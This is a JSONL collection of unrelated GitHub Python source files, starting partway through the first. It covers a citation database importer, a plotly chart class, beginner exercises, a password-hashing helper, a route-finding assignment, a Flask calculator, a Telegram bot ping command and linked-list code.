\"Classification-JEL\":\n codes = {c.strip() for c in v.split(\", \")}\n for c in codes:\n if len(c) != 3:\n raise ValueError(\"Not a 3-letter code\")\n jel = self.s.query(JEL).filter(JEL.code == c).first()\n if jel is None:\n jel = JEL(code=c)\n paper.jel.append(jel)\n elif k == \"Handle\":\n paper.handle = v\n # TODO is this check necessary?\n # paper_exists = self.s.query(Paper).filter(Paper.handle==paper.handle).first()\n # if paper_exists is not None:\n # paper =\n if len(paper.authors) == 0:\n raise ImportError(\"An article with empty authors:\", paper.handle)\n self.s.add(paper)\n self.s.commit()\n print(\"Paper added:\", paper.handle)\n paper = Paper()\n\n\n def import_all(self, file, n=0):\n rfs = RFS(REPEC_OPT_DIR)\n if n == 0:\n for file in rfs.realpaths():\n self.import_rdf(file)\n else:\n for i, file in enumerate(rfs.realpaths(), start=1):\n self.import_rdf(file)\n if i >= n: break\n print(\"Importing is completed\")\n\n\ndef main():\n if REPECI_MODE == \"use\":\n use()\n elif REPECI_MODE == \"create\":\n create()\n\n\ndef use():\n db = DB()\n G = db.ref_graph()\n rm = db.ref_metrics(G)\n print(rm.info(), rm.describe())\n db.s.close()\n\n\ndef create():\n if RECREATE_DB:\n try:\n os.remove(REPECI_DB)\n print(\"File removed:\", REPECI_DB)\n except FileNotFoundError:\n if str(input(\"File not found. Continue with a new one? [y/n] \")) == \"n\":\n return None\n except OSError as e:\n print(\"Failed with:\", e.strerror)\n print(\"Error code:\", e.code)\n db = DB()\n\n s = time.perf_counter()\n db.import_all(REPEC_OPT_DIR, n=RDF_MAX)\n e = time.perf_counter()\n print(\"%d rdf files have been imported in %d seconds\" % (RDF_MAX, round(e - s, 1)))\n\n s = time.perf_counter()\n db.import_refs(REPEC_REFS_FILE, n=REFS_MAX)\n e = time.perf_counter()\n print(\"%d reference nodes have been imported in %d seconds\" % (REFS_MAX, round(e - s, 1)))\n\n db.s.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antontarasenko/repeci","sub_path":"repeci/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":11916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8361779568","text":"from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType\nimport copy as _copy\n\n\nclass Bar(_BaseTraceHierarchyType):\n\n # class properties\n # --------------------\n _parent_path_str = \"indicator.gauge\"\n _path_str = \"indicator.gauge.bar\"\n _valid_props = {\"color\", \"line\", \"thickness\"}\n\n # color\n # -----\n @property\n def color(self):\n \"\"\"\n Sets the background color of the arc.\n\n The 'color' property is a color and may be specified as:\n - A hex string (e.g. '#ff0000')\n - An rgb/rgba string (e.g. 'rgb(255,0,0)')\n - An hsl/hsla string (e.g. 'hsl(0,100%,50%)')\n - An hsv/hsva string (e.g. 'hsv(0,100%,100%)')\n - A named CSS color:\n aliceblue, antiquewhite, aqua, aquamarine, azure,\n beige, bisque, black, blanchedalmond, blue,\n blueviolet, brown, burlywood, cadetblue,\n chartreuse, chocolate, coral, cornflowerblue,\n cornsilk, crimson, cyan, darkblue, darkcyan,\n darkgoldenrod, darkgray, darkgrey, darkgreen,\n darkkhaki, darkmagenta, darkolivegreen, darkorange,\n darkorchid, darkred, darksalmon, darkseagreen,\n darkslateblue, darkslategray, darkslategrey,\n darkturquoise, darkviolet, deeppink, deepskyblue,\n dimgray, dimgrey, dodgerblue, firebrick,\n floralwhite, forestgreen, fuchsia, gainsboro,\n ghostwhite, gold, goldenrod, gray, grey, green,\n greenyellow, honeydew, hotpink, indianred, indigo,\n ivory, khaki, lavender, lavenderblush, lawngreen,\n lemonchiffon, lightblue, lightcoral, lightcyan,\n lightgoldenrodyellow, lightgray, lightgrey,\n lightgreen, lightpink, lightsalmon, lightseagreen,\n lightskyblue, lightslategray, lightslategrey,\n lightsteelblue, lightyellow, lime, limegreen,\n linen, magenta, maroon, mediumaquamarine,\n mediumblue, mediumorchid, mediumpurple,\n mediumseagreen, mediumslateblue, mediumspringgreen,\n mediumturquoise, mediumvioletred, midnightblue,\n mintcream, mistyrose, moccasin, navajowhite, navy,\n oldlace, olive, olivedrab, orange, orangered,\n orchid, palegoldenrod, palegreen, paleturquoise,\n palevioletred, papayawhip, peachpuff, peru, pink,\n plum, powderblue, purple, red, rosybrown,\n royalblue, rebeccapurple, saddlebrown, salmon,\n sandybrown, seagreen, seashell, sienna, silver,\n skyblue, slateblue, slategray, slategrey, snow,\n springgreen, steelblue, tan, teal, thistle, tomato,\n turquoise, violet, wheat, white, whitesmoke,\n yellow, yellowgreen\n\n Returns\n -------\n str\n \"\"\"\n return self[\"color\"]\n\n @color.setter\n def color(self, val):\n self[\"color\"] = val\n\n # line\n # ----\n @property\n def line(self):\n \"\"\"\n The 'line' property is an instance of Line\n that may be specified as:\n - An instance of :class:`plotly.graph_objs.indicator.gauge.bar.Line`\n - A dict of string/value properties that will be passed\n to the Line constructor\n\n Supported dict properties:\n\n color\n Sets the color of the line enclosing each\n sector.\n width\n Sets the width (in px) of the line enclosing\n each sector.\n\n Returns\n -------\n plotly.graph_objs.indicator.gauge.bar.Line\n \"\"\"\n return self[\"line\"]\n\n @line.setter\n def line(self, val):\n self[\"line\"] = val\n\n # thickness\n # ---------\n @property\n def thickness(self):\n \"\"\"\n Sets the thickness of the bar as a fraction of the total\n thickness of the gauge.\n\n The 'thickness' property is a number and may be specified as:\n - An int or float in the interval [0, 1]\n\n Returns\n -------\n int|float\n \"\"\"\n return self[\"thickness\"]\n\n @thickness.setter\n def thickness(self, val):\n self[\"thickness\"] = val\n\n # Self properties description\n # ---------------------------\n @property\n def _prop_descriptions(self):\n return \"\"\"\\\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.bar.Line`\n instance or dict with compatible properties\n thickness\n Sets the thickness of the bar as a fraction of the\n total thickness of the gauge.\n \"\"\"\n\n def __init__(self, arg=None, color=None, line=None, thickness=None, **kwargs):\n \"\"\"\n Construct a new Bar object\n\n Set the appearance of the gauge's value\n\n Parameters\n ----------\n arg\n dict of properties compatible with this constructor or\n an instance of\n :class:`plotly.graph_objs.indicator.gauge.Bar`\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.bar.Line`\n instance or dict with compatible properties\n thickness\n Sets the thickness of the bar as a fraction of the\n total thickness of the gauge.\n\n Returns\n -------\n Bar\n \"\"\"\n super(Bar, self).__init__(\"bar\")\n\n if \"_parent\" in kwargs:\n self._parent = kwargs[\"_parent\"]\n return\n\n # Validate arg\n # ------------\n if arg is None:\n arg = {}\n elif isinstance(arg, self.__class__):\n arg = arg.to_plotly_json()\n elif isinstance(arg, dict):\n arg = _copy.copy(arg)\n else:\n raise ValueError(\n \"\"\"\\\nThe first argument to the plotly.graph_objs.indicator.gauge.Bar\nconstructor must be a dict or\nan instance of :class:`plotly.graph_objs.indicator.gauge.Bar`\"\"\"\n )\n\n # Handle skip_invalid\n # -------------------\n self._skip_invalid = kwargs.pop(\"skip_invalid\", False)\n self._validate = kwargs.pop(\"_validate\", True)\n\n # Populate data dict with properties\n # ----------------------------------\n _v = arg.pop(\"color\", None)\n _v = color if color is not None else _v\n if _v is not None:\n self[\"color\"] = _v\n _v = arg.pop(\"line\", None)\n _v = line if line is not None else _v\n if _v is not None:\n self[\"line\"] = _v\n _v = arg.pop(\"thickness\", None)\n _v = thickness if thickness is not None else _v\n if _v is not None:\n self[\"thickness\"] = _v\n\n # Process unknown kwargs\n # ----------------------\n self._process_kwargs(**dict(arg, **kwargs))\n\n # Reset skip_invalid\n # ------------------\n self._skip_invalid = False\n","repo_name":"plotly/plotly.py","sub_path":"packages/python/plotly/plotly/graph_objs/indicator/gauge/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","stars":14438,"dataset":"github-code","pt":"3"}
+{"seq_id":"29748307234","text":"#7-1\ncar=input(\"Which car do you want to rent: \")\nprint(\"Let me see if I can find you a \" + car +\".\")\n\n#7-2\nsize=input(\"Please tell me how many of you have a dinner: \")\nsize=int(size)\nif size>8:\n print(\"Sorry, no fit table.\")\nelse:\n print(\"There is free table.\")\n\n#7-3\nnumber=input(\"Please input a number: \")\nnumber=int(number)\nif number%10==0:\n print(\"It's 10's times.\")\nelse:\n print(\"It isn't 10's times.\")\n\n#7-4\\7-6\n#active出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\nactive=True\nwhile active:\n pl=input(prompt)\n if pl==\"quit\":\n active=False\n else:\n print(\"We'll add \"+ pl +\".\")\n#while条件测试出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\npl=\"\"\nwhile pl!=\"quit\":\n pl=input(prompt)\n if pl!=\"quit\":\n print(\"We'll add \"+ pl +\".\")\n#break出口\nprompt=\"Please input pei liao(Input 'quit' to end the program): \"\nwhile True:\n pl=input(prompt)\n if pl==\"quit\":\n break\n else:\n print(\"We'll add \"+ pl +\".\")\n#7-5\\7-6\n#break出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nwhile True:\n age=input(prompt)\n if age==\"quit\":\n break\n else:\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n#while条件测试出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nage=\"\"\nwhile age!=\"quit\":\n age=input(prompt)\n if age!=\"quit\":\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n#active出口\nprompt=\"Please input your age(Input 'quit' to end): \"\nactive=True\nwhile active:\n age=input(prompt)\n if age==\"quit\":\n active=False\n else:\n age=int(age)\n if age<3:\n price=\"free\"\n elif age<=12:\n price=\"10 dollars\"\n else:\n price=\"15 dollars\"\n print(price)\n\n#7-7 Ctrl+C退出循环 \n \n#7-8\nsandwich_orders=[\"a-sandwich\",\"b-sandwich\",\"c-sandwich\"]\nfinished_sandwiches=[]\nwhile sandwich_orders:\n sandwich=sandwich_orders.pop()\n print(\"I made your \" +sandwich +\".\")\n finished_sandwiches.append(sandwich)\nprint(\"---All sandwiches have been finished:---\")\nfor sandwich in finished_sandwiches:\n print(\"\\t\"+sandwich)\n \n#7-9\nsandwich_orders1=[\"c-sandwich\",\"b-sandwich\",\"c-sandwich\",\n \"pastrami\",\"pastrami\",\"pastrami\"]\nfinished_sandwiches1=[]\nprint(\"Sorry,Pastrami has been sold out!\")\nwhile \"pastrami\" in sandwich_orders1:\n sandwich_orders1.remove(\"pastrami\")\nprint(sandwich_orders1)\n\n#7-10\npoll={}\nactive=True\nwhile active:\n name=input(\"Input your name: \")\n place=input(\"If you could visit one place in the world, where would you go? \")\n poll[name]=place\n response=input(\"Continue?(yes/no): \")\n if response==\"no\":\n active=False\n\nprint(\"\\n---All poll results as follows---\")\nfor n,p in poll.items():\n print(n.title()+ \" dreams of visiting \" + p.title() + \".\")\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"cxd375727676/from_introduction_to_practice","sub_path":"mycodes/chapter7.py","file_name":"chapter7.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8218808681","text":"#!/usr/bin/python3\n\n#prompt use to enter a number\n\nnum = input('Please enter a number betweeen 1 and 9: ')\n\nnum = int(num)\n\n#check the number is within the range\n\nif (num >= 1) and (num <=9 ):\n\n print(f'Your guessed of is {num} right')\n \nelse:\n print(f'{num} is out of range,, please try again')\n","repo_name":"nguredavid/learnpython","sub_path":"test/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35954903715","text":"import binascii\nimport hashlib\nimport os\nfrom typing import Optional\n\n\nBYTES_COUNT: int = 60\nSHA_ITER_COUNT: int = 100000\nHASH_FUNC: str = \"sha512\"\n\n\ndef get_random_bytes(count: int = BYTES_COUNT) -> bytes:\n \"\"\"\n Return count of random bytes.\n\n :param count: Count of bytes\n :type count: int\n :return: Random bytes\n :rtype: bytes\n \"\"\"\n\n return os.urandom(count)\n\n\ndef generate_salt(random_bytes: Optional[bytes] = None) -> bytes:\n \"\"\"\n Generate hash salt.\n\n :param random_bytes: Random bytes for salting\n :type random_bytes: Optional[bytes]\n :return: Salted bytes\n :rtype: bytes\n \"\"\"\n\n random_bytes = get_random_bytes() if random_bytes is None else random_bytes\n\n return hashlib.sha256(random_bytes).hexdigest().encode(\"ascii\")\n\n\ndef hash_string(\n string: str,\n *,\n salt: Optional[bytes] = None,\n sha_iter_count: int = SHA_ITER_COUNT,\n hash_func: str = HASH_FUNC\n) -> str:\n \"\"\"\n Hash string by input parameters.\n\n :param string: String to be hashed\n :type string: str\n :param salt: Salt for hashing\n :type salt: Optional[bytes]\n :param sha_iter_count: Count of hashing iterations\n :type sha_iter_count: int\n :param hash_func: Function for hashing\n :type hash_func: str\n :return: Hashed string\n :rtype: str\n \"\"\"\n\n salt = generate_salt() if salt is None else salt\n\n hashed_string = hashlib.pbkdf2_hmac(\n hash_func, string.encode(\"utf-8\"), salt, sha_iter_count\n )\n hashed_string = binascii.hexlify(hashed_string)\n\n return (salt + hashed_string).decode(\"ascii\")\n","repo_name":"MehdiMJ1/aioinsta","sub_path":"api/utils/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16395693140","text":"import pandas as pd\nimport os\nfrom os import listdir\nimport numpy as np\nimport json\nimport ast\n\ndir = \"/scratch/nvw224/videos_new/\" # \"/Volumes/Backup/umpeval/MIL/2017/\" #\nv = \"CENTERFIELD\"\nsavename = \"ATL_CF_metadata.csv\"\n\nstart = True\ncenter_field_dic = {}\nmonths = listdir(dir)\nfor month in months:\n days = listdir(os.path.join(dir, month))\n print(days)\n for day in days:\n nr = listdir(os.path.join(dir, month, day))[0]\n cf = listdir(os.path.join(dir, month, day, nr, v))\n for files in cf:\n if files[-4:]==\".dat\":\n name = files.split(\".\")[0]\n for i in open(os.path.join(dir, month, day, nr, v, files)).readlines():\n datContent=ast.literal_eval(i)\n if start:\n d = {}\n for k in list(datContent.keys()):\n d[k] = [datContent[k]]\n d[\"play_id\"] = [name]\n start = False\n print(d)\n else:\n for k in list(d.keys()):\n if k == \"play_id\":\n d[k].append(name)\n else:\n try:\n d[k].append(datContent[k])\n except KeyError:\n d[k].append(np.nan)\n print(k)\n continue\n\ndf = pd.DataFrame(data=d)\nnew_df = df.rename(columns = {\"pitch_type\": \"Pitch Type\"})\nnew_df.to_csv(savename)\n\n# TO CONVERT TO CSV AFTERWARDS:\n#with open(\"/scratch/nvw224/pitch_type/Pose_Estimation/release_frame_boston.json\", \"w\") as outfile:\n# json.dump(center_field_dic, outfile)\n# a = list(center_field_dic.keys())\n# b = np.zeros(len(a))\n# i=0\n# for play in a:\n# b[i]=center_field_dic[play]\n# i+=1\n#\n# d = {\"play_id\":a, column:b}\n","repo_name":"NinaWie/pitch_type","sub_path":"utils_filtering/dat_files_labels_to_csv.py","file_name":"dat_files_labels_to_csv.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"26500247904","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 9-9.py\n@Time : 06/11/2022, 12:20:47\n@Author : Antti Hakkarainen\n@Student : K79735\n@Contact : antti.i.hakkarainen@tuni.fi\n@Course : COMP.CS.100 Ohjelmointi 1.\n@Desc : TEMP\n'''\n\nCITY_PRINT_WIDTH:int = 14\nDIST_PRINT_WIDTH:int = 5\n\ndef print_destinations(distances:dict, city:str) -> None:\n \"\"\"\n Print destinations of a city\n\n :param dict distances:\n :param str city:\n \"\"\"\n \n for dest in sorted(distances[city]): \n print(f'{city: <{CITY_PRINT_WIDTH}}' + \n f'{dest: <{CITY_PRINT_WIDTH}}' + \n f'{distances[city][dest]: >{DIST_PRINT_WIDTH}}')\n\ndef read_distance_file(filename:str) -> list:\n \"\"\"\n Reads rows from file to list\n \n param : str, filename from user\n return: list, rows from read file (or empty list if none was read)\n \"\"\"\n \n try:\n with open (filename, \"r\", encoding=\"utf-8\") as read_file:\n rows:list = read_file.readlines() \n read_file.close()\n except OSError:\n print(f\"Error: '{filename}' can not be read.\")\n return []\n \n return rows\n\ndef add_rows_to_dict(rows:list) -> dict:\n \"\"\"\n Adds read rows to dict\n \n param : list, of rows read from file\n return: dict, distances[city:str][destination:str] = distance:int\n \"\"\"\n \n distances:dict = {}\n\n for row in rows: \n split_row = row.strip().split(\";\")\n if len(split_row) != 3:\n print(\"Error: Too many or too few entries in a row:\")\n print(row)\n return {}\n \n city:str = split_row[0]\n dest:str = split_row[1]\n dist:int = int(split_row[2])\n \n if len(city) == 0 or len(dest) == 0:\n print(\"Error: Bad data in file.\")\n return {}\n\n if city not in distances:\n distances[city] = {dest: dist}\n else: \n distances[city].update({dest: dist}) \n \n return distances\n\ndef add_key_value_pair(distances:dict) -> None:\n \"\"\"\n Adds connection to dict\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n dest:str = input(\"Enter destination city: \")\n try:\n temp:str = (input(\"Distance: \"))\n dist:int = int(temp)\n except ValueError:\n print(f\"Error: '{temp}' is not an integer.\")\n return\n \n if city not in distances:\n distances[city] = {dest: dist} \n else: \n distances[city].update({dest: dist}) \n \n if dest not in distances:\n distances[dest] = {}\n \ndef remove_key_value_pair(distances:dict) -> None:\n \"\"\"\n Removes connection from dict\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances: \n print(f\"Error: '{city}' is unknown.\") \n return\n \n dest:str = input(\"Enter destination city: \")\n if dest in distances[city]:\n distances[city].pop(dest)\n else:\n print(f\"Error: missing road segment between '{city}' and '{dest}'.\")\n \ndef print_neighbours(distances:dict) -> None:\n \"\"\"\n Lists neighbours of a city\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances: \n print(f\"Error: '{city}' is unknown.\") \n return\n \n print_destinations(distances, city)\n \ndef fetch_neighbours(distances:dict, city:str) -> list:\n \"\"\"\n Returns a list of all the cities that are directly connected to city.\n \n :param data: dict, distance information between the known cities.\n :param city: str, the name of the city whose neighbours we\n are interested in.\n :return: list[str], the neighbouring city names in a list.\n \"\"\"\n \n neighbours:list = []\n \n if city in distances:\n for dest in distances[city]:\n neighbours.append(dest)\n \n return neighbours\n\ndef distance_to_neighbour(distances:dict, city:str, dest:str):\n \"\"\"\n Returns the distance between two neighbouring cities. \n \n :param data: dict, distance information between the known cities.\n :param departure: str, the name of the departure city.\n :param destination: str, the name of the destination city.\n :return: int | None, The distance between and\n . None if there is no direct connection\n between the two cities.\n \"\"\"\n \n if city in distances:\n if dest in distances[city]:\n return distances[city][dest]\n \n return None\n \ndef print_route(distances:dict) -> None:\n \"\"\"\n Prints route from city to dest\n \n param : dict, of connections\n return: none\n \"\"\"\n \n city:str = input(\"Enter departure city: \")\n if city not in distances:\n print(f\"Error: '{city}' is unknown.\")\n return\n dest:str = input(\"Enter destination city: \") \n \n # uses premade algo to find route \n route = find_route(distances, city, dest)\n \n # no route\n if len(route) == 0: \n print(f\"No route found between '{city}' and '{dest}'.\")\n # 2 cities long route\n elif len(route) == 2:\n # same city and dest?\n if route[0] == route[1]:\n print(f\"{route[0]}-{route[1]} (0 km)\")\n # different cities\n else:\n print(f\"{route[0]}-{route[1]} ({distances[route[0]][route[1]]} km)\")\n # otherwise prints a long route\n else:\n route_str:str = \"\"\n route_len:int = 0\n route_stops:int = len(route)\n i:int = 0\n \n while i < route_stops:\n if i < route_stops-1: \n route_len += distances[route[i]][route[i+1]]\n route_str += f\"{route[i]}-\"\n i += 1\n \n print(route_str.rstrip('-') + f\" ({str(route_len)} km)\") \n\ndef menu(distances:dict) -> None:\n \"\"\"\n Displays a python 3.6 compatible menu for user\n \n param : dict, of connections\n return: none\n \"\"\"\n \n while True:\n cmd = input(\"Enter action> \")\n \n if cmd == \"display\":\n for city in sorted(distances):\n print_destinations(distances, city) \n elif cmd == \"add\":\n add_key_value_pair(distances)\n elif cmd == \"remove\":\n remove_key_value_pair(distances)\n elif cmd == \"neighbours\":\n print_neighbours(distances)\n elif cmd == \"route\":\n print_route(distances)\n elif cmd == \"\":\n print(\"Done and done!\")\n return None\n else:\n print(f\"Error: unknown action '{cmd}'.\") \n \"\"\"\n rip no python 3.10 :'(\n match cmd:\n case \"display\":\n display(distances)\n case \"add\":\n add_key_value_pair(distances)\n case \"remove\":\n remove_key_value_pair(distances)\n case \"neighbours\":\n list_neighbours(distances)\n case \"route\":\n get_route(distances)\n case \"\":\n print(\"Done and done!\")\n return None\n case _:\n print(f\"Error: unknown action '{cmd}'.\") \n \"\"\"\n \ndef find_route(data, departure, destination):\n \"\"\"\n This function tries to find a route between \n and cities. It assumes the existence of\n the two functions fetch_neighbours and distance_to_neighbour\n (see the assignment and the function templates below).\n They are used to get the relevant information from the data\n structure for find_route to be able to do the search.\n\n The return value is a list of cities one must travel through\n to get from to . If for any\n reason the route does not exist, the return value is\n an empty list [].\n\n :param: dict, of connections\n :param departure: str, the name of the departure city.\n :param destination: str, the name of the destination city.\n :return: list[str], a list of cities the route travels through, or\n an empty list if the route can not be found. If the departure\n and the destination cities are the same, the function returns\n a two element list where the departure city is stores twice.\n \"\"\"\n\n if departure not in data:\n return []\n\n elif departure == destination:\n return [departure, destination]\n\n greens = {departure}\n deltas = {departure: 0}\n came_from = {departure: None}\n\n while True:\n if destination in greens:\n break\n\n red_neighbours = []\n for city in greens:\n for neighbour in fetch_neighbours(data, city):\n if neighbour not in greens:\n delta = deltas[city] + distance_to_neighbour(data, city, neighbour)\n red_neighbours.append((city, neighbour, delta))\n\n if not red_neighbours:\n return []\n\n current_city, next_city, delta = min(red_neighbours, key=lambda x: x[2])\n\n greens.add(next_city)\n deltas[next_city] = delta\n came_from[next_city] = current_city\n\n route = []\n while True:\n route.append(destination)\n if destination == departure:\n break\n destination = came_from.get(destination)\n\n return list(reversed(route))\n\ndef main():\n filename = input(\"Enter input file name: \")\n rows = read_distance_file(filename)\n \n # exit prog if nothing was read\n if len(rows) == 0:\n return 0 \n \n # exit prog if data was invalid\n dist = add_rows_to_dict(rows)\n if len(dist) == 0:\n return 0\n \n menu(dist)\n \n \"\"\"\n import pprint\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(dist)\n \"\"\"\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ahakkar/ohj1","sub_path":"9-0-0/9-9.py","file_name":"9-9.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"707341522","text":"from copy import deepcopy\n\nwith open('input', 'r') as f:\n data = f.read().split('\\n\\n')\n\n\ndef rotate(a):\n b = []\n for i in range(len(a[0])):\n b.append([])\n for i in a:\n for j,k in enumerate(i):\n b[j].insert(0,k)\n return b\n\ndata[0], number = data[0].split(' 1')\n\n\nstacks = []\nstack = []\nfor i, j in enumerate(data[0]):\n if j == '\\n':\n stacks.append(stack)\n stack = []\n elif i%4 == 1:\n stack.append(j)\n\nstacks = rotate(stacks)\n\nnew_stacks = []\nfor i in range(len(stacks)):\n st = []\n for j in range(len(stacks[0])):\n if stacks[i][j] != ' ':\n st.append(stacks[i][j])\n new_stacks.append(st[:])\n\ntask1 = deepcopy(new_stacks)\ntask2 = deepcopy(new_stacks)\n\n\n#taks1 + task2\nfor i in data[1].split('\\n'):\n z = list(map(int,i.replace('move','').replace(' from ',' ').replace(' to ',' ').split()))\n y = [] #task2\n for j in range(z[0]):\n x = task1[z[1]-1].pop() #task1\n task1[z[2]-1].append(x) #task1\n\n y.insert(0, task2[z[1]-1].pop()) #task2\n task2[z[2]-1].extend(y[:]) #task2\n \n \n\nfor i in task1:\n print(i[-1], end='')\nprint()\n\n\nfor i in task2:\n print(i[-1], end='')\nprint()","repo_name":"zorell11/advent-of-code-2022","sub_path":"05/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19806704764","text":"from flask import Flask, render_template,request,flash\napp=Flask(__name__)\n \n@app.route('/')\ndef entry_page():\n return render_template('home.html',page_title='Welcome to tiny-miny Einstein Project')\n\n@app.route('/h')\ndef entry_page1():\n return render_template('home1.html',page_title='Welcome to tiny-miny Einstein Project')\n\n\n\n\n@app.route('/sum',methods=['POST'])\ndef sum():\n x=int(request.form['firstValue'])\n y=int(request.form['secondValue'])\n return render_template('sum.html',page_title='Calculation result',sum_result=(x+y),first_value=x,second_value=y)\n \n@app.route('/minus',methods=['POST'])\ndef minus():\n x=int(request.form['firstValue'])\n y=int(request.form['secondValue'])\n return render_template('minus.html',page_title='Calculation result',sum_result1=(x-y),first_value=x,second_value=y)\n \n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Aydawka/calculation-via-python-flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"31410229583","text":"import time\nfrom datetime import datetime\nfrom thebot import dankbot\nfrom pyrogram.types import Message\nfrom pyrogram import filters\nfrom thebot import StartTime\ndef get_readable_time(seconds: int) -> str:\n count = 0\n ping_time = \"\"\n time_list = []\n time_suffix_list = [\"s\", \"m\", \"h\", \"days\"]\n while count < 4:\n count += 1\n remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)\n if seconds == 0 and remainder == 0:\n break\n time_list.append(int(result))\n seconds = int(remainder)\n for x in range(len(time_list)):\n time_list[x] = str(time_list[x]) + time_suffix_list[x]\n if len(time_list) == 4:\n ping_time += time_list.pop() + \", \"\n time_list.reverse()\n ping_time += \":\".join(time_list)\n return ping_time\n\n@dankbot.on_message(~filters.me & filters.command('ping', prefixes='/'), group=8)\nasync def ping_bot(_, message):\n start_time = time.time()\n m = await message.reply_text(\"Pinging...\")\n end_time = time.time()\n ping_time = round((end_time - start_time) * 1000, 3)\n uptime = get_readable_time((time.time() - StartTime))\n await m.edit_text(f\"**EsseX replied in:** `{ping_time}ms`\\n**EsseX uptime:** {uptime}\", parse_mode='markdown')\n\n","repo_name":"Dank-del/EsseX","sub_path":"thebot/modules/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"3"}
+{"seq_id":"25438846535","text":"from . import Node\n\nclass LinkedList:\n '''\n Linked Lists are a sequence of nodes.\n It starts with a head, and can be uni o bidirectional,\n - get_head_node returns where the linked list starts.\n - insert_beginning first instanciate a new node and then links it to the current head_node,\n consecuently after setting the new node as head node it becomes the first node in the linked list\n without losing any information.\n - stringify_list shows the values from each node in the linked list\n - remove_node remove a node by it's value\n '''\n def __init__(self, value=None):\n self.head_node = Node(value)\n\n def get_head_node(self):\n return self.head_node\n\n def insert_beginning(self, new_value):\n new_node = Node(new_value)\n new_node.set_next_node(self.head_node)\n self.head_node = new_node\n\n def stringify_list(self):\n string_list = \"\"\n current_node = self.get_head_node()\n while current_node:\n if current_node.get_value() != None:\n string_list += f'{current_node.get_value()}'\n current_node = current_node.get_next_node()\n return string_list\n \n def remove_node(self, value_to_remove):\n current_node = self.head_node\n \n if current_node.get_value() == value_to_remove:\n self.head_node = current_node.get_next_node()\n else:\n while current_node:\n next_node = current_node.get_next_node() \n if next_node.get_value() == value_to_remove:\n current_node.set_next_node(next_node.get_next_node())\n current_node = None\n else:\n current_node = next_node\n\n'''\nSwapping elements in a linked list\n'''\n\ndef swap_nodes(input_list, val1, val2):\n print(f'Swapping {val1} with {val2}')\n\n node1_prev = None\n node2_prev = None\n node1 = input_list.head_node\n node2 = input_list.head_node\n\n if val1 == val2:\n print(\"Elements are the same - no swap needed\")\n return\n\n while node1 is not None:\n if node1.get_value() == val1:\n break\n node1_prev = node1\n node1 = node1.get_next_node()\n\n while node2 is not None:\n if node2.get_value() == val2:\n break\n node2_prev = node2\n node2 = node2.get_next_node()\n\n if (node1 is None or node2 is None):\n print(\"Swap not possible - one or more element is not in the list\")\n return\n\n if node1_prev is None:\n input_list.head_node = node2\n else:\n node1_prev.set_next_node(node2)\n\n if node2_prev is None:\n input_list.head_node = node1\n else:\n node2_prev.set_next_node(node1)\n\n temp = node1.get_next_node()\n node1.set_next_node(node2.get_next_node())\n node2.set_next_node(temp)\n\n\n'''\nTwo Pointer Moving in parallel\n'''\n\ndef nth_last_node(linked_list, n):\n current = None\n tail_seeker = linked_list.head_node\n count = 1\n while tail_seeker:\n tail_seeker = tail_seeker.get_next_node()\n count += 1\n if count >= n + 1:\n if current is None:\n current = linked_list.head_node\n else:\n current = current.get_next_node()\n return current\n\n '''\n Pointers moving at different speeds\n '''\n\n from LinkedList import LinkedList\n\ndef find_middle(linked_list):\n fast = linked_list.head_node\n slow = linked_list.head_node\n while fast:\n fast = fast.get_next_node()\n if fast:\n fast = fast.get_next_node()\n slow = slow.get_next_node()\n return slow\n","repo_name":"sancara/python-data-structures-and-algos","sub_path":"data_structures/linked_lists.py","file_name":"linked_lists.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
